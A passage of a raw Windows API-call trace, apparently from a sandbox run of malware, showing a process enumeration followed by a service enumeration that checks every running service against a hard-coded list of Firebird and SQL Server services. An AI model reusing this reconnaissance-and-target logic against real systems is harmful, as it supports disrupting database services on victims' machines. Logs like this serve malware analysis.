th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0069.335] lstrlenW (lpString="hgaibc.exe") returned 10 [0069.335] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0069.342] lstrlenW (lpString="cmd.exe") returned 7 [0069.342] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0069.343] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0069.343] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0069.344] lstrlenW (lpString="conhost.exe") returned 11 [0069.344] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0069.345] lstrlenW (lpString="conhost.exe") returned 11 [0069.345] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.345] lstrlenW (lpString="svchost.exe") returned 11 [0069.345] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0069.346] lstrlenW (lpString="svchost.exe") returned 11 [0069.346] Process32NextW (in: hSnapshot=0x39c, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcfc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0069.347] CloseHandle (hObject=0x39c) returned 1 [0069.347] Sleep (dwMilliseconds=0x1f4) [0070.346] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ee80 [0070.347] EnumServicesStatusExW (in: hSCManager=0x60ee80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0070.347] GetLastError () returned 0xea [0070.347] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1d5a) returned 0x3cd2e68 [0070.347] EnumServicesStatusExW (in: hSCManager=0x60ee80, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3cd2e68, cbBufSize=0x1d5a, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3cd2e68, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0070.348] CloseServiceHandle (hSCObject=0x60ee80) returned 1 [0070.348] lstrlenW (lpString="Appinfo") returned 7 [0070.348] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0070.348] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0070.348] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0070.348] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0070.348] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0070.348] lstrlenW (lpString="AppXSvc") returned 7 [0070.348] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0070.348] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0070.348] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0070.349] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0070.349] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0070.349] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0070.349] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0070.349] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0070.349] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0070.349] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0070.349] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0070.349] lstrlenW (lpString="Audiosrv") returned 8 [0070.349] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0070.349] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0070.349] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0070.349] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0070.349] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0070.349] lstrlenW (lpString="BFE") returned 3 [0070.349] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0070.349] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0070.349] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0070.349] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0070.349] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0070.349] lstrlenW (lpString="BITS") returned 4 [0070.349] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0070.349] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0070.349] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0070.349] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0070.349] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0070.349] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0070.349] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0070.349] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0070.349] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0070.349] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0070.349] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0070.349] lstrlenW (lpString="CDPSvc") returned 6 [0070.349] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0070.349] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0070.349] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0070.349] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0070.350] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0070.350] lstrlenW (lpString="ClickToRunSvc") returned 13 [0070.350] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0070.350] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0070.350] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0070.350] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0070.350] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0070.350] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0070.350] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0070.350] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0070.350] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0070.350] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0070.350] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0070.350] lstrlenW (lpString="CryptSvc") returned 8 [0070.350] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0070.350] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0070.350] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0070.350] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0070.350] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0070.350] lstrlenW (lpString="DcomLaunch") returned 10 [0070.350] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0070.350] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0070.350] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0070.350] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0070.350] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0070.350] lstrlenW (lpString="DeviceAssociationService") returned 24 [0070.350] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0070.350] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0070.350] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0070.350] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0070.350] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0070.350] lstrlenW (lpString="Dhcp") returned 4 [0070.350] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0070.350] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0070.350] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0070.350] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0070.351] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0070.351] lstrlenW (lpString="Dnscache") returned 8 [0070.351] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0070.351] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0070.351] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0070.351] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0070.351] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0070.351] lstrlenW (lpString="DoSvc") returned 5 [0070.351] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DoSvc") returned 1 [0070.351] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DoSvc") returned 1 [0070.351] lstrcmpiW (lpString1="sqlwriter", lpString2="DoSvc") returned 1 [0070.351] lstrcmpiW (lpString1="mssqlserver", lpString2="DoSvc") returned 1 [0070.351] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DoSvc") returned 1 [0070.351] lstrlenW (lpString="DPS") returned 3 [0070.351] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0070.351] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0070.351] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0070.351] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0070.351] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0070.351] lstrlenW (lpString="DusmSvc") returned 7 [0070.351] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0070.351] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0070.351] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0070.351] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0070.351] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0070.351] lstrlenW (lpString="EventLog") returned 8 [0070.351] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0070.351] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0070.351] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0070.351] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0070.351] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0070.351] lstrlenW (lpString="EventSystem") returned 11 [0070.351] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0070.351] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0070.351] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0070.351] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0070.352] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0070.352] lstrlenW (lpString="FontCache") returned 9 [0070.352] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0070.352] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0070.352] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0070.352] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0070.352] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0070.352] lstrlenW (lpString="gpsvc") returned 5 [0070.352] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0070.352] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0070.352] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0070.352] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0070.352] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0070.352] lstrlenW (lpString="iphlpsvc") returned 8 [0070.352] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="iphlpsvc") returned -1 [0070.352] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="iphlpsvc") returned -1 [0070.352] lstrcmpiW (lpString1="sqlwriter", lpString2="iphlpsvc") returned 1 [0070.352] lstrcmpiW (lpString1="mssqlserver", lpString2="iphlpsvc") returned 1 [0070.352] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="iphlpsvc") returned 1 [0070.352] lstrlenW (lpString="KeyIso") returned 6 [0070.352] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="KeyIso") returned -1 [0070.352] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="KeyIso") returned -1 [0070.352] lstrcmpiW (lpString1="sqlwriter", lpString2="KeyIso") returned 1 [0070.352] lstrcmpiW (lpString1="mssqlserver", lpString2="KeyIso") returned 1 [0070.352] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="KeyIso") returned 1 [0070.352] lstrlenW (lpString="LanmanServer") returned 12 [0070.352] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanServer") returned -1 [0070.352] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanServer") returned -1 [0070.352] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanServer") returned 1 [0070.352] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanServer") returned 1 [0070.352] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanServer") returned 1 [0070.352] lstrlenW (lpString="LanmanWorkstation") returned 17 [0070.352] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0070.352] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0070.352] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0070.352] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0070.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0070.353] lstrlenW (lpString="lfsvc") returned 5 [0070.353] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lfsvc") returned -1 [0070.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lfsvc") returned -1 [0070.353] lstrcmpiW (lpString1="sqlwriter", lpString2="lfsvc") returned 1 [0070.353] lstrcmpiW (lpString1="mssqlserver", lpString2="lfsvc") returned 1 [0070.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lfsvc") returned 1 [0070.353] lstrlenW (lpString="lmhosts") returned 7 [0070.353] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0070.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0070.353] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0070.353] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0070.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0070.353] lstrlenW (lpString="LSM") returned 3 [0070.353] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LSM") returned -1 [0070.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LSM") returned -1 [0070.353] lstrcmpiW (lpString1="sqlwriter", lpString2="LSM") returned 1 [0070.353] lstrcmpiW (lpString1="mssqlserver", lpString2="LSM") returned 1 [0070.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LSM") returned 1 [0070.353] lstrlenW (lpString="MapsBroker") returned 10 [0070.353] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MapsBroker") returned -1 [0070.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MapsBroker") returned -1 [0070.353] lstrcmpiW (lpString1="sqlwriter", lpString2="MapsBroker") returned 1 [0070.353] lstrcmpiW (lpString1="mssqlserver", lpString2="MapsBroker") returned 1 [0070.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MapsBroker") returned 1 [0070.353] lstrlenW (lpString="MpsSvc") returned 6 [0070.353] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0070.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0070.353] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0070.353] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0070.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0070.353] lstrlenW (lpString="NcbService") returned 10 [0070.353] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NcbService") returned -1 [0070.353] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NcbService") returned -1 [0070.353] lstrcmpiW (lpString1="sqlwriter", lpString2="NcbService") returned 1 [0070.353] lstrcmpiW (lpString1="mssqlserver", lpString2="NcbService") returned -1 [0070.353] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NcbService") returned 1 [0070.354] lstrlenW (lpString="netprofm") returned 8 [0070.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="netprofm") returned -1 [0070.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="netprofm") returned -1 [0070.354] lstrcmpiW (lpString1="sqlwriter", lpString2="netprofm") returned 1 [0070.354] lstrcmpiW (lpString1="mssqlserver", lpString2="netprofm") returned -1 [0070.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="netprofm") returned 1 [0070.354] lstrlenW (lpString="NlaSvc") returned 6 [0070.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0070.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0070.354] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0070.354] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0070.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0070.354] lstrlenW (lpString="nsi") returned 3 [0070.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0070.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0070.354] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0070.354] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0070.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0070.354] lstrlenW (lpString="PcaSvc") returned 6 [0070.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0070.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0070.354] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0070.354] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0070.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0070.354] lstrlenW (lpString="PlugPlay") returned 8 [0070.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0070.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0070.354] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0070.354] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0070.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0070.354] lstrlenW (lpString="Power") returned 5 [0070.354] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0070.354] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0070.354] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0070.354] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0070.354] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0070.355] lstrlenW (lpString="ProfSvc") returned 7 [0070.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0070.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0070.355] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0070.355] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0070.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0070.355] lstrlenW (lpString="RpcEptMapper") returned 12 [0070.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0070.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0070.355] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0070.355] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0070.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0070.355] lstrlenW (lpString="RpcSs") returned 5 [0070.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0070.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0070.355] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0070.355] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0070.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0070.355] lstrlenW (lpString="SamSs") returned 5 [0070.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0070.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0070.355] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0070.355] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0070.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0070.355] lstrlenW (lpString="Schedule") returned 8 [0070.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0070.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0070.355] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0070.355] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0070.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0070.355] lstrlenW (lpString="SecurityHealthService") returned 21 [0070.355] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SecurityHealthService") returned -1 [0070.355] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SecurityHealthService") returned -1 [0070.355] lstrcmpiW (lpString1="sqlwriter", lpString2="SecurityHealthService") returned 1 [0070.355] lstrcmpiW (lpString1="mssqlserver", lpString2="SecurityHealthService") returned -1 [0070.355] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SecurityHealthService") returned 1 [0070.356] lstrlenW (lpString="SENS") returned 4 [0070.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0070.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0070.356] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0070.356] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0070.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0070.356] lstrlenW (lpString="ShellHWDetection") returned 16 [0070.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0070.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0070.356] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0070.356] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0070.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0070.356] lstrlenW (lpString="Spooler") returned 7 [0070.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0070.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0070.356] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0070.356] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0070.356] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0070.356] lstrlenW (lpString="SSDPSRV") returned 7 [0070.356] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SSDPSRV") returned -1 [0070.356] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SSDPSRV") returned -1 [0070.356] lstrcmpiW (lpString1="sqlwriter", lpString2="SSDPSRV") returned -1 [0070.356] lstrcmpiW 